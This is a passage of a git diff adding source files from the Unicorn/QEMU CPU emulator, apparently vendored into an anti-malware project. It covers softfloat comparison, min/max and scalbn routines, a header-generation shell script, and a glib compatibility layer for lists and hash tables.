float_relation_equal; + } else { + return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); + } + } +} + +int floatx80_compare( floatx80 a, floatx80 b STATUS_PARAM ) +{ + return 
floatx80_compare_internal(a, b, 0 STATUS_VAR); +} + +int floatx80_compare_quiet( floatx80 a, floatx80 b STATUS_PARAM ) +{ + return floatx80_compare_internal(a, b, 1 STATUS_VAR); +} + +static inline int float128_compare_internal( float128 a, float128 b, + int is_quiet STATUS_PARAM ) +{ + flag aSign, bSign; + + if (( ( extractFloat128Exp( a ) == 0x7fff ) && + ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) ) || + ( ( extractFloat128Exp( b ) == 0x7fff ) && + ( extractFloat128Frac0( b ) | extractFloat128Frac1( b ) ) )) { + if (!is_quiet || + float128_is_signaling_nan( a ) || + float128_is_signaling_nan( b ) ) { + float_raise( float_flag_invalid STATUS_VAR); + } + return float_relation_unordered; + } + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign != bSign ) { + if ( ( ( ( a.high | b.high )<<1 ) | a.low | b.low ) == 0 ) { + /* zero case */ + return float_relation_equal; + } else { + return 1 - (2 * aSign); + } + } else { + if (a.low == b.low && a.high == b.high) { + return float_relation_equal; + } else { + return 1 - 2 * (aSign ^ ( lt128( a.high, a.low, b.high, b.low ) )); + } + } +} + +int float128_compare( float128 a, float128 b STATUS_PARAM ) +{ + return float128_compare_internal(a, b, 0 STATUS_VAR); +} + +int float128_compare_quiet( float128 a, float128 b STATUS_PARAM ) +{ + return float128_compare_internal(a, b, 1 STATUS_VAR); +} + +/* min() and max() functions. These can't be implemented as + * 'compare and pick one input' because that would mishandle + * NaNs and +0 vs -0. + * + * minnum() and maxnum() functions. These are similar to the min() + * and max() functions but if one of the arguments is a QNaN and + * the other is numerical then the numerical argument is returned. + * minnum() and maxnum correspond to the IEEE 754-2008 minNum() + * and maxNum() operations. min() and max() are the typical min/max + * semantics provided by many CPUs which predate that specification. 
+ *
+ * minnummag() and maxnummag() functions correspond to minNumMag()
+ * and maxNumMag() from the IEEE-754 2008.
+ */
+#define MINMAX(s) \
+static inline float ## s float ## s ## _minmax(float ## s a, float ## s b, \
+                                               int ismin, int isieee, \
+                                               int ismag STATUS_PARAM) \
+{ \
+    flag aSign, bSign; \
+    uint ## s ## _t av, bv, aav, abv; \
+    a = float ## s ## _squash_input_denormal(a STATUS_VAR); \
+    b = float ## s ## _squash_input_denormal(b STATUS_VAR); \
+    if (float ## s ## _is_any_nan(a) || \
+        float ## s ## _is_any_nan(b)) { \
+        if (isieee) { \
+            if (float ## s ## _is_quiet_nan(a) && \
+                !float ## s ##_is_any_nan(b)) { \
+                return b; \
+            } else if (float ## s ## _is_quiet_nan(b) && \
+                       !float ## s ## _is_any_nan(a)) { \
+                return a; \
+            } \
+        } \
+        return propagateFloat ## s ## NaN(a, b STATUS_VAR); \
+    } \
+    aSign = extractFloat ## s ## Sign(a); \
+    bSign = extractFloat ## s ## Sign(b); \
+    av = float ## s ## _val(a); \
+    bv = float ## s ## _val(b); \
+    if (ismag) { \
+        aav = float ## s ## _abs(av); \
+        abv = float ## s ## _abs(bv); \
+        if (aav != abv) { \
+            if (ismin) { \
+                return (aav < abv) ? a : b; \
+            } else { \
+                return (aav < abv) ? b : a; \
+            } \
+        } \
+    } \
+    if (aSign != bSign) { \
+        if (ismin) { \
+            return aSign ? a : b; \
+        } else { \
+            return aSign ? b : a; \
+        } \
+    } else { \
+        if (ismin) { \
+            return (aSign ^ (av < bv)) ? a : b; \
+        } else { \
+            return (aSign ^ (av < bv)) ?
b : a; \ + } \ + } \ +} \ + \ +float ## s float ## s ## _min(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 1, 0, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _max(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 0, 0, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _minnum(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 1, 1, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _maxnum(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 0, 1, 0 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _minnummag(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 1, 1, 1 STATUS_VAR); \ +} \ + \ +float ## s float ## s ## _maxnummag(float ## s a, float ## s b STATUS_PARAM) \ +{ \ + return float ## s ## _minmax(a, b, 0, 1, 1 STATUS_VAR); \ +} + +MINMAX(32) +MINMAX(64) + + +/* Multiply A by 2 raised to the power N. 
 */
+/* Returns a * 2^n in single precision, rounded per the current mode.
+ * NaNs are propagated; infinities and zeros are returned unchanged. */
+float32 float32_scalbn( float32 a, int n STATUS_PARAM )
+{
+    flag aSign;
+    int16_t aExp;
+    uint32_t aSig;
+
+    a = float32_squash_input_denormal(a STATUS_VAR);
+    aSig = extractFloat32Frac( a );
+    aExp = extractFloat32Exp( a );
+    aSign = extractFloat32Sign( a );
+
+    if ( aExp == 0xFF ) {
+        /* NaN or infinity: scaling cannot change the value */
+        if ( aSig ) {
+            return propagateFloat32NaN( a, a STATUS_VAR );
+        }
+        return a;
+    }
+    if (aExp != 0) {
+        aSig |= 0x00800000;   /* make the implicit integer bit explicit */
+    } else if (aSig == 0) {
+        return a;             /* +/-0 is unaffected */
+    } else {
+        aExp++;               /* denormal: offset the shared "- 1" below */
+    }
+
+    /* Clamp n: beyond this range the result saturates to 0/inf anyway,
+     * and the clamp keeps the aExp addition from overflowing. */
+    if (n > 0x200) {
+        n = 0x200;
+    } else if (n < -0x200) {
+        n = -0x200;
+    }
+
+    aExp += n - 1;
+    aSig <<= 7;
+    return normalizeRoundAndPackFloat32( aSign, aExp, aSig STATUS_VAR );
+}
+
+/* Returns a * 2^n in double precision; mirrors float32_scalbn. */
+float64 float64_scalbn( float64 a, int n STATUS_PARAM )
+{
+    flag aSign;
+    int16_t aExp;
+    uint64_t aSig;
+
+    a = float64_squash_input_denormal(a STATUS_VAR);
+    aSig = extractFloat64Frac( a );
+    aExp = extractFloat64Exp( a );
+    aSign = extractFloat64Sign( a );
+
+    if ( aExp == 0x7FF ) {
+        if ( aSig ) {
+            return propagateFloat64NaN( a, a STATUS_VAR );
+        }
+        return a;
+    }
+    if (aExp != 0) {
+        aSig |= LIT64( 0x0010000000000000 );   /* explicit integer bit */
+    } else if (aSig == 0) {
+        return a;
+    } else {
+        aExp++;               /* denormal: offset the shared "- 1" below */
+    }
+
+    if (n > 0x1000) {
+        n = 0x1000;
+    } else if (n < -0x1000) {
+        n = -0x1000;
+    }
+
+    aExp += n - 1;
+    aSig <<= 10;
+    return normalizeRoundAndPackFloat64( aSign, aExp, aSig STATUS_VAR );
+}
+
+/* Returns a * 2^n in extended double precision.  No "- 1"/shift pair is
+ * needed here because the x80 format stores its integer bit explicitly. */
+floatx80 floatx80_scalbn( floatx80 a, int n STATUS_PARAM )
+{
+    flag aSign;
+    int32_t aExp;
+    uint64_t aSig;
+
+    if (floatx80_invalid_encoding(a)) {
+        float_raise(float_flag_invalid STATUS_VAR);
+        return floatx80_default_nan;
+    }
+    aSig = extractFloatx80Frac( a );
+    aExp = extractFloatx80Exp( a );
+    aSign = extractFloatx80Sign( a );
+
+    if ( aExp == 0x7FFF ) {
+        if ( aSig<<1 ) {
+            return propagateFloatx80NaN( a, a STATUS_VAR );
+        }
+        return a;
+    }
+
+    if (aExp == 0) {
+        if (aSig == 0) {
+            return a;
+        }
+        aExp++;
+    }
+
+    if (n > 0x10000) {
+        n = 0x10000;
+    } else if (n < -0x10000) {
+        n = -0x10000;
+    }
+
+    aExp += n;
+    return normalizeRoundAndPackFloatx80( STATUS(floatx80_rounding_precision),
+                                          aSign, aExp, aSig, 0 STATUS_VAR );
+}
+
+/* Returns a * 2^n in quad precision; mirrors float64_scalbn. */
+float128 float128_scalbn( float128 a, int n STATUS_PARAM )
+{
+    flag aSign;
+    int32_t aExp;
+    uint64_t aSig0, aSig1;
+
+    aSig1 = extractFloat128Frac1( a );
+    aSig0 = extractFloat128Frac0( a );
+    aExp = extractFloat128Exp( a );
+    aSign = extractFloat128Sign( a );
+    if ( aExp == 0x7FFF ) {
+        if ( aSig0 | aSig1 ) {
+            return propagateFloat128NaN( a, a STATUS_VAR );
+        }
+        return a;
+    }
+    if (aExp != 0) {
+        aSig0 |= LIT64( 0x0001000000000000 );
+    } else if (aSig0 == 0 && aSig1 == 0) {
+        return a;
+    } else {
+        aExp++;
+    }
+
+    if (n > 0x10000) {
+        n = 0x10000;
+    } else if (n < -0x10000) {
+        n = -0x10000;
+    }
+
+    aExp += n - 1;
+    return normalizeRoundAndPackFloat128( aSign, aExp, aSig0, aSig1
+                                          STATUS_VAR );
+
+}
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/gen_all_header.sh b/ai_anti_malware/unicorn/unicorn-master/qemu/gen_all_header.sh
new file mode 100644
index 0000000..1330ae5
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/gen_all_header.sh
@@ -0,0 +1,4 @@
+#!/bin/sh
+for d in x86_64 arm armeb m68k aarch64 aarch64eb mips mipsel mips64 mips64el sparc sparc64; do
+python header_gen.py $d > $d.h
+done
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/glib_compat.c b/ai_anti_malware/unicorn/unicorn-master/qemu/glib_compat.c
new file mode 100644
index 0000000..946e4f0
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/glib_compat.c
@@ -0,0 +1,1457 @@
+/*
+glib_compat.c replacement functionality for glib code used in qemu
+Copyright (C) 2016 Chris Eagle cseagle at gmail dot com
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+ +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +*/ + +// Part of this code was lifted from glib-2.28.0. +// Glib license is available in COPYING_GLIB file in root directory. + +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif + +#include <string.h> +#include <stdlib.h> +#include <stdio.h> +#include <limits.h> + +#include "glib_compat.h" + +#define MAX(a, b) (((a) > (b)) ? (a) : (b)) +#ifndef _WIN64 +#define GPOINTER_TO_UINT(p) ((guint)(uintptr_t)(p)) +#else +#define GPOINTER_TO_UINT(p) ((guint) (guint64) (p)) +#endif +#define G_MAXINT INT_MAX + +/* All functions below added to eliminate GLIB dependency */ + +/* hashing and equality functions */ +// Hash functions lifted glib-2.28.0/glib/ghash.c + +/** + * g_direct_hash: + * @v: a #gpointer key + * + * Converts a gpointer to a hash value. + * It can be passed to g_hash_table_new() as the @hash_func parameter, + * when using pointers as keys in a #GHashTable. + * + * Returns: a hash value corresponding to the key. + */ +static guint g_direct_hash (gconstpointer v) +{ + return GPOINTER_TO_UINT (v); +} + +// g_str_hash() is lifted glib-2.28.0/glib/gstring.c +/** + * g_str_hash: + * @v: a string key + * + * Converts a string to a hash value. + * + * This function implements the widely used "djb" hash apparently posted + * by Daniel Bernstein to comp.lang.c some time ago. The 32 bit + * unsigned hash value starts at 5381 and for each byte 'c' in the + * string, is updated: <literal>hash = hash * 33 + c</literal>. This + * function uses the signed value of each byte. 
+ * + * It can be passed to g_hash_table_new() as the @hash_func parameter, + * when using strings as keys in a #GHashTable. + * + * Returns: a hash value corresponding to the key + **/ +guint g_str_hash (gconstpointer v) +{ + const signed char *p; + guint32 h = 5381; + + for (p = v; *p != '\0'; p++) + h = (h << 5) + h + *p; + + return h; +} + +gboolean g_str_equal(gconstpointer v1, gconstpointer v2) +{ + return strcmp((const char*)v1, (const char*)v2) == 0; +} + +// g_int_hash() is lifted from glib-2.28.0/glib/gutils.c +/** + * g_int_hash: + * @v: a pointer to a #gint key + * + * Converts a pointer to a #gint to a hash value. + * It can be passed to g_hash_table_new() as the @hash_func parameter, + * when using pointers to integers values as keys in a #GHashTable. + * + * Returns: a hash value corresponding to the key. + */ +guint g_int_hash (gconstpointer v) +{ + return *(const gint*) v; +} + +gboolean g_int_equal(gconstpointer v1, gconstpointer v2) +{ + return *((const gint*)v1) == *((const gint*)v2); +} + +/* Doubly-linked list */ + +GList *g_list_first(GList *list) +{ + if (list == NULL) return NULL; + while (list->prev) list = list->prev; + return list; +} + +void g_list_foreach(GList *list, GFunc func, gpointer user_data) +{ + GList *lp; + for (lp = list; lp; lp = lp->next) { + (*func)(lp->data, user_data); + } +} + +void g_list_free(GList *list) +{ + GList *lp, *next, *prev = NULL; + if (list) prev = list->prev; + for (lp = list; lp; lp = next) { + next = lp->next; + free(lp); + } + for (lp = prev; lp; lp = prev) { + prev = lp->prev; + free(lp); + } +} + +GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare) +{ + GList *i; + GList *n = (GList*)g_malloc(sizeof(GList)); + n->data = data; + if (list == NULL) { + n->next = n->prev = NULL; + return n; + } + for (i = list; i; i = i->next) { + n->prev = i->prev; + if ((*compare)(data, i->data) <= 0) { + n->next = i; + i->prev = n; + if (i == list) return n; + else return list; + } + } + 
n->prev = n->prev->next; + n->next = NULL; + n->prev->next = n; + return list; +} + +GList *g_list_prepend(GList *list, gpointer data) +{ + GList *n = (GList*)g_malloc(sizeof(GList)); + n->next = list; + n->prev = NULL; + n->data = data; + return n; +} + +GList *g_list_remove_link(GList *list, GList *llink) +{ + if (llink) { + if (llink == list) list = list->next; + if (llink->prev) llink->prev->next = llink->next; + if (llink->next) llink->next->prev = llink->prev; + } + return list; +} + +// code copied from glib/glist.c, version 2.28.0 +static GList *g_list_sort_merge(GList *l1, + GList *l2, + GFunc compare_func, + gpointer user_data) +{ + GList list, *l, *lprev; + gint cmp; + + l = &list; + lprev = NULL; + + while (l1 && l2) + { + cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data); + + if (cmp <= 0) + { + l->next = l1; + l1 = l1->next; + } + else + { + l->next = l2; + l2 = l2->next; + } + l = l->next; + l->prev = lprev; + lprev = l; + } + l->next = l1 ? l1 : l2; + l->next->prev = l; + + return list.next; +} + +static GList *g_list_sort_real(GList *list, + GFunc compare_func, + gpointer user_data) +{ + GList *l1, *l2; + + if (!list) + return NULL; + if (!list->next) + return list; + + l1 = list; + l2 = list->next; + + while ((l2 = l2->next) != NULL) + { + if ((l2 = l2->next) == NULL) + break; + l1 = l1->next; + } + l2 = l1->next; + l1->next = NULL; + + return g_list_sort_merge (g_list_sort_real (list, compare_func, user_data), + g_list_sort_real (l2, compare_func, user_data), + compare_func, + user_data); +} + +/** + * g_list_sort: + * @list: a #GList + * @compare_func: the comparison function used to sort the #GList. + * This function is passed the data from 2 elements of the #GList + * and should return 0 if they are equal, a negative value if the + * first element comes before the second, or a positive value if + * the first element comes after the second. + * + * Sorts a #GList using the given comparison function. 
+ * + * Returns: the start of the sorted #GList + */ +/** + * GCompareFunc: + * @a: a value. + * @b: a value to compare with. + * @Returns: negative value if @a < @b; zero if @a = @b; positive + * value if @a > @b. + * + * Specifies the type of a comparison function used to compare two + * values. The function should return a negative integer if the first + * value comes before the second, 0 if they are equal, or a positive + * integer if the first value comes after the second. + **/ +GList *g_list_sort (GList *list, GCompareFunc compare_func) +{ + return g_list_sort_real (list, (GFunc) compare_func, NULL); +} + +/* END of g_list related functions */ + +/* Singly-linked list */ + +GSList *g_slist_append(GSList *list, gpointer data) +{ + GSList *head = list; + if (list) { + while (list->next) list = list->next; + list->next = (GSList*)g_malloc(sizeof(GSList)); + list = list->next; + } else { + head = list = (GSList*)g_malloc(sizeof(GSList)); + } + list->data = data; + list->next = NULL; + return head; +} + +void g_slist_foreach(GSList *list, GFunc func, gpointer user_data) +{ + GSList *lp; + for (lp = list; lp; lp = lp->next) { + (*func)(lp->data, user_data); + } +} + +void g_slist_free(GSList *list) +{ + GSList *lp, *next; + for (lp = list; lp; lp = next) { + next = lp->next; + free(lp); + } +} + +GSList *g_slist_prepend(GSList *list, gpointer data) +{ + GSList *head = (GSList*)g_malloc(sizeof(GSList)); + head->next = list; + head->data = data; + return head; +} + +static GSList *g_slist_sort_merge (GSList *l1, + GSList *l2, + GFunc compare_func, + gpointer user_data) +{ + GSList list, *l; + gint cmp; + + l=&list; + + while (l1 && l2) + { + cmp = ((GCompareDataFunc) compare_func) (l1->data, l2->data, user_data); + + if (cmp <= 0) + { + l=l->next=l1; + l1=l1->next; + } + else + { + l=l->next=l2; + l2=l2->next; + } + } + l->next= l1 ? 
l1 : l2; + + return list.next; +} + +static GSList *g_slist_sort_real (GSList *list, + GFunc compare_func, + gpointer user_data) +{ + GSList *l1, *l2; + + if (!list) + return NULL; + if (!list->next) + return list; + + l1 = list; + l2 = list->next; + + while ((l2 = l2->next) != NULL) + { + if ((l2 = l2->next) == NULL) + break; + l1=l1->next; + } + l2 = l1->next; + l1->next = NULL; + + return g_slist_sort_merge (g_slist_sort_real (list, compare_func, user_data), + g_slist_sort_real (l2, compare_func, user_data), + compare_func, + user_data); +} + +/** + * g_slist_sort: + * @list: a #GSList + * @compare_func: the comparison function used to sort the #GSList. + * This function is passed the data from 2 elements of the #GSList + * and should return 0 if they are equal, a negative value if the + * first element comes before the second, or a positive value if + * the first element comes after the second. + * + * Sorts a #GSList using the given comparison function. + * + * Returns: the start of the sorted #GSList + */ +GSList *g_slist_sort (GSList *list, + GCompareFunc compare_func) +{ + return g_slist_sort_real (list, (GFunc) compare_func, NULL); +} + +/* END of g_slist related functions */ + +// Hash functions lifted glib-2.28.0/glib/ghash.c + +#define HASH_TABLE_MIN_SHIFT 3 /* 1 << 3 == 8 buckets */ + +typedef struct _GHashNode GHashNode; + +struct _GHashNode { + gpointer key; + gpointer value; + + /* If key_hash == 0, node is not in use + * If key_hash == 1, node is a tombstone + * If key_hash >= 2, node contains data */ + guint key_hash; +}; + +struct _GHashTable { + gint size; + gint mod; + guint mask; + gint nnodes; + gint noccupied; /* nnodes + tombstones */ + GHashNode *nodes; + GHashFunc hash_func; + GEqualFunc key_equal_func; + volatile gint ref_count; + GDestroyNotify key_destroy_func; + GDestroyNotify value_destroy_func; +}; + +/** + * g_hash_table_destroy: + * @hash_table: a #GHashTable. 
+ * + * Destroys all keys and values in the #GHashTable and decrements its + * reference count by 1. If keys and/or values are dynamically allocated, + * you should either free them first or create the #GHashTable with destroy + * notifiers using g_hash_table_new_full(). In the latter case the destroy + * functions you supplied will be called on all keys and values during the + * destruction phase. + **/ +void g_hash_table_destroy (GHashTable *hash_table) +{ + if (hash_table == NULL) return; + if (hash_table->ref_count == 0) return; + + g_hash_table_remove_all (hash_table); + g_hash_table_unref (hash_table); +} + +/** + * g_hash_table_find: + * @hash_table: a #GHashTable. + * @predicate: function to test the key/value pairs for a certain property. + * @user_data: user data to pass to the function. + * + * Calls the given function for key/value pairs in the #GHashTable until + * @predicate returns %TRUE. The function is passed the key and value of + * each pair, and the given @user_data parameter. The hash table may not + * be modified while iterating over it (you can't add/remove items). + * + * Note, that hash tables are really only optimized for forward lookups, + * i.e. g_hash_table_lookup(). + * So code that frequently issues g_hash_table_find() or + * g_hash_table_foreach() (e.g. in the order of once per every entry in a + * hash table) should probably be reworked to use additional or different + * data structures for reverse lookups (keep in mind that an O(n) find/foreach + * operation issued for all n values in a hash table ends up needing O(n*n) + * operations). + * + * Return value: The value of the first key/value pair is returned, for which + * func evaluates to %TRUE. If no pair with the requested property is found, + * %NULL is returned. 
+ * + * Since: 2.4 + **/ +gpointer g_hash_table_find (GHashTable *hash_table, + GHRFunc predicate, + gpointer user_data) +{ + gint i; + + if (hash_table == NULL) return NULL; + if (predicate == NULL) return NULL; + + for (i = 0; i < hash_table->size; i++) + { + GHashNode *node = &hash_table->nodes [i]; + + if (node->key_hash > 1 && predicate (node->key, node->value, user_data)) + return node->value; + } + + return NULL; +} + +/** + * g_hash_table_foreach: + * @hash_table: a #GHashTable. + * @func: the function to call for each key/value pair. + * @user_data: user data to pass to the function. + * + * Calls the given function for each of the key/value pairs in the + * #GHashTable. The function is passed the key and value of each + * pair, and the given @user_data parameter. The hash table may not + * be modified while iterating over it (you can't add/remove + * items). To remove all items matching a predicate, use + * g_hash_table_foreach_remove(). + * + * See g_hash_table_find() for performance caveats for linear + * order searches in contrast to g_hash_table_lookup(). + **/ +void g_hash_table_foreach (GHashTable *hash_table, + GHFunc func, + gpointer user_data) +{ + gint i; + + if (hash_table == NULL) return; + if (func == NULL) return; + + for (i = 0; i < hash_table->size; i++) + { + GHashNode *node = &hash_table->nodes [i]; + + if (node->key_hash > 1) + (* func) (node->key, node->value, user_data); + } +} + +/* + * g_hash_table_lookup_node_for_insertion: + * @hash_table: our #GHashTable + * @key: the key to lookup against + * @hash_return: key hash return location + * Return value: index of the described #GHashNode + * + * Performs a lookup in the hash table, preserving extra information + * usually needed for insertion. + * + * This function first computes the hash value of the key using the + * user's hash function. 
+ * + * If an entry in the table matching @key is found then this function + * returns the index of that entry in the table, and if not, the + * index of an unused node (empty or tombstone) where the key can be + * inserted. + * + * The computed hash value is returned in the variable pointed to + * by @hash_return. This is to save insertions from having to compute + * the hash record again for the new record. + */ +static inline guint g_hash_table_lookup_node_for_insertion (GHashTable *hash_table, + gconstpointer key, + guint *hash_return) +{ + GHashNode *node; + guint node_index; + guint hash_value; + guint first_tombstone = 0; + gboolean have_tombstone = FALSE; + guint step = 0; + + /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. + * We need to make sure our hash value is not one of these. */ + + hash_value = (* hash_table->hash_func) (key); + if (hash_value <= 1) + hash_value = 2; + + *hash_return = hash_value; + + node_index = hash_value % hash_table->mod; + node = &hash_table->nodes [node_index]; + + while (node->key_hash) + { + /* We first check if our full hash values + * are equal so we can avoid calling the full-blown + * key equality function in most cases. + */ + + if (node->key_hash == hash_value) + { + if (hash_table->key_equal_func) + { + if (hash_table->key_equal_func (node->key, key)) + return node_index; + } + else if (node->key == key) + { + return node_index; + } + } + else if (node->key_hash == 1 && !have_tombstone) + { + first_tombstone = node_index; + have_tombstone = TRUE; + } + + step++; + node_index += step; + node_index &= hash_table->mask; + node = &hash_table->nodes [node_index]; + } + + if (have_tombstone) + return first_tombstone; + + return node_index; +} + +/* Each table size has an associated prime modulo (the first prime + * lower than the table size) used to find the initial bucket. Probing + * then works modulo 2^n. The prime modulo is necessary to get a + * good distribution with poor hash functions. 
*/ +static const gint prime_mod [] = { + 1, /* For 1 << 0 */ + 2, + 3, + 7, + 13, + 31, + 61, + 127, + 251, + 509, + 1021, + 2039, + 4093, + 8191, + 16381, + 32749, + 65521, /* For 1 << 16 */ + 131071, + 262139, + 524287, + 1048573, + 2097143, + 4194301, + 8388593, + 16777213, + 33554393, + 67108859, + 134217689, + 268435399, + 536870909, + 1073741789, + 2147483647 /* For 1 << 31 */ +}; + +static void g_hash_table_set_shift (GHashTable *hash_table, gint shift) +{ + gint i; + guint mask = 0; + + hash_table->size = 1 << shift; + hash_table->mod = prime_mod [shift]; + + for (i = 0; i < shift; i++) + { + mask <<= 1; + mask |= 1; + } + + hash_table->mask = mask; +} + +static gint g_hash_table_find_closest_shift (gint n) +{ + gint i; + + for (i = 0; n; i++) + n >>= 1; + + return i; +} + +static void g_hash_table_set_shift_from_size (GHashTable *hash_table, gint size) +{ + gint shift; + + shift = g_hash_table_find_closest_shift (size); + shift = MAX (shift, HASH_TABLE_MIN_SHIFT); + + g_hash_table_set_shift (hash_table, shift); +} + +/* + * g_hash_table_resize: + * @hash_table: our #GHashTable + * + * Resizes the hash table to the optimal size based on the number of + * nodes currently held. If you call this function then a resize will + * occur, even if one does not need to occur. Use + * g_hash_table_maybe_resize() instead. + * + * This function may "resize" the hash table to its current size, with + * the side effect of cleaning up tombstones and otherwise optimizing + * the probe sequences. 
+ */ +static void g_hash_table_resize (GHashTable *hash_table) +{ + GHashNode *new_nodes; + gint old_size; + gint i; + + old_size = hash_table->size; + g_hash_table_set_shift_from_size (hash_table, hash_table->nnodes * 2); + + new_nodes = g_new0 (GHashNode, hash_table->size); + + for (i = 0; i < old_size; i++) + { + GHashNode *node = &hash_table->nodes [i]; + GHashNode *new_node; + guint hash_val; + guint step = 0; + + if (node->key_hash <= 1) + continue; + + hash_val = node->key_hash % hash_table->mod; + new_node = &new_nodes [hash_val]; + + while (new_node->key_hash) + { + step++; + hash_val += step; + hash_val &= hash_table->mask; new_node = &new_nodes [hash_val]; + } + + *new_node = *node; + } + + g_free (hash_table->nodes); + hash_table->nodes = new_nodes; + hash_table->noccupied = hash_table->nnodes; +} + +/* + * g_hash_table_maybe_resize: + * @hash_table: our #GHashTable + * + * Resizes the hash table, if needed. + * + * Essentially, calls g_hash_table_resize() if the table has strayed + * too far from its ideal size for its number of nodes. + */ +static inline void g_hash_table_maybe_resize (GHashTable *hash_table) +{ + gint noccupied = hash_table->noccupied; + gint size = hash_table->size; + + if ((size > hash_table->nnodes * 4 && size > 1 << HASH_TABLE_MIN_SHIFT) || + (size <= noccupied + (noccupied / 16))) + g_hash_table_resize (hash_table); +} + +/* + * g_hash_table_insert_internal: + * @hash_table: our #GHashTable + * @key: the key to insert + * @value: the value to insert + * @keep_new_key: if %TRUE and this key already exists in the table + * then call the destroy notify function on the old key. If %FALSE + * then call the destroy notify function on the new key. + * + * Implements the common logic for the g_hash_table_insert() and + * g_hash_table_replace() functions. + * + * Do a lookup of @key. If it is found, replace it with the new + * @value (and perhaps the new @key). If it is not found, create a + * new node. 
+ */ +static void g_hash_table_insert_internal (GHashTable *hash_table, + gpointer key, + gpointer value, + gboolean keep_new_key) +{ + GHashNode *node; + guint node_index; + guint key_hash; + guint old_hash; + + if (hash_table == NULL) return; + if (hash_table->ref_count == 0) return; + + node_index = g_hash_table_lookup_node_for_insertion (hash_table, key, &key_hash); + node = &hash_table->nodes [node_index]; + + old_hash = node->key_hash; + + if (old_hash > 1) + { + if (keep_new_key) + { + if (hash_table->key_destroy_func) + hash_table->key_destroy_func (node->key); + node->key = key; + } + else + { + if (hash_table->key_destroy_func) + hash_table->key_destroy_func (key); + } + + if (hash_table->value_destroy_func) + hash_table->value_destroy_func (node->value); + + node->value = value; + } + else + { + node->key = key; + node->value = value; + node->key_hash = key_hash; + + hash_table->nnodes++; + + if (old_hash == 0) + { + /* We replaced an empty node, and not a tombstone */ + hash_table->noccupied++; + g_hash_table_maybe_resize (hash_table); + } + } +} + +/** + * g_hash_table_insert: + * @hash_table: a #GHashTable. + * @key: a key to insert. + * @value: the value to associate with the key. + * + * Inserts a new key and value into a #GHashTable. + * + * If the key already exists in the #GHashTable its current value is replaced + * with the new value. If you supplied a @value_destroy_func when creating the + * #GHashTable, the old value is freed using that function. If you supplied + * a @key_destroy_func when creating the #GHashTable, the passed key is freed + * using that function. 
+ **/ +void g_hash_table_insert (GHashTable *hash_table, + gpointer key, + gpointer value) +{ + g_hash_table_insert_internal (hash_table, key, value, FALSE); +} + +/* + * g_hash_table_lookup_node: + * @hash_table: our #GHashTable + * @key: the key to lookup against + * @hash_return: optional key hash return location + * Return value: index of the described #GHashNode + * + * Performs a lookup in the hash table. Virtually all hash operations + * will use this function internally. + * + * This function first computes the hash value of the key using the + * user's hash function. + * + * If an entry in the table matching @key is found then this function + * returns the index of that entry in the table, and if not, the + * index of an empty node (never a tombstone). + */ +static inline guint g_hash_table_lookup_node (GHashTable *hash_table, + gconstpointer key) +{ + GHashNode *node; + guint node_index; + guint hash_value; + guint step = 0; + + /* Empty buckets have hash_value set to 0, and for tombstones, it's 1. + * We need to make sure our hash value is not one of these. */ + + hash_value = (* hash_table->hash_func) (key); + if (hash_value <= 1) + hash_value = 2; + + node_index = hash_value % hash_table->mod; + node = &hash_table->nodes [node_index]; + + while (node->key_hash) + { + /* We first check if our full hash values + * are equal so we can avoid calling the full-blown + * key equality function in most cases. + */ + + if (node->key_hash == hash_value) + { + if (hash_table->key_equal_func) + { + if (hash_table->key_equal_func (node->key, key)) + break; + } + else if (node->key == key) + { + break; + } + } + + step++; + node_index += step; + node_index &= hash_table->mask; + node = &hash_table->nodes [node_index]; + } + + return node_index; +} + +/** + * g_hash_table_lookup: + * @hash_table: a #GHashTable. + * @key: the key to look up. + * + * Looks up a key in a #GHashTable. 
Note that this function cannot + * distinguish between a key that is not present and one which is present + * and has the value %NULL. If you need this distinction, use + * g_hash_table_lookup_extended(). + * + * Return value: the associated value, or %NULL if the key is not found. + **/ +gpointer g_hash_table_lookup (GHashTable *hash_table, + gconstpointer key) +{ + GHashNode *node; + guint node_index; + + if (hash_table == NULL) return NULL; + + node_index = g_hash_table_lookup_node (hash_table, key); + node = &hash_table->nodes [node_index]; + + return node->key_hash ? node->value : NULL; +} + +/** + * g_hash_table_new: + * @hash_func: a function to create a hash value from a key. + * Hash values are used to determine where keys are stored within the + * #GHashTable data structure. The g_direct_hash(), g_int_hash(), + * g_int64_hash(), g_double_hash() and g_str_hash() functions are provided + * for some common types of keys. + * If hash_func is %NULL, g_direct_hash() is used. + * @key_equal_func: a function to check two keys for equality. This is + * used when looking up keys in the #GHashTable. The g_direct_equal(), + * g_int_equal(), g_int64_equal(), g_double_equal() and g_str_equal() + * functions are provided for the most common types of keys. + * If @key_equal_func is %NULL, keys are compared directly in a similar + * fashion to g_direct_equal(), but without the overhead of a function call. + * + * Creates a new #GHashTable with a reference count of 1. + * + * Return value: a new 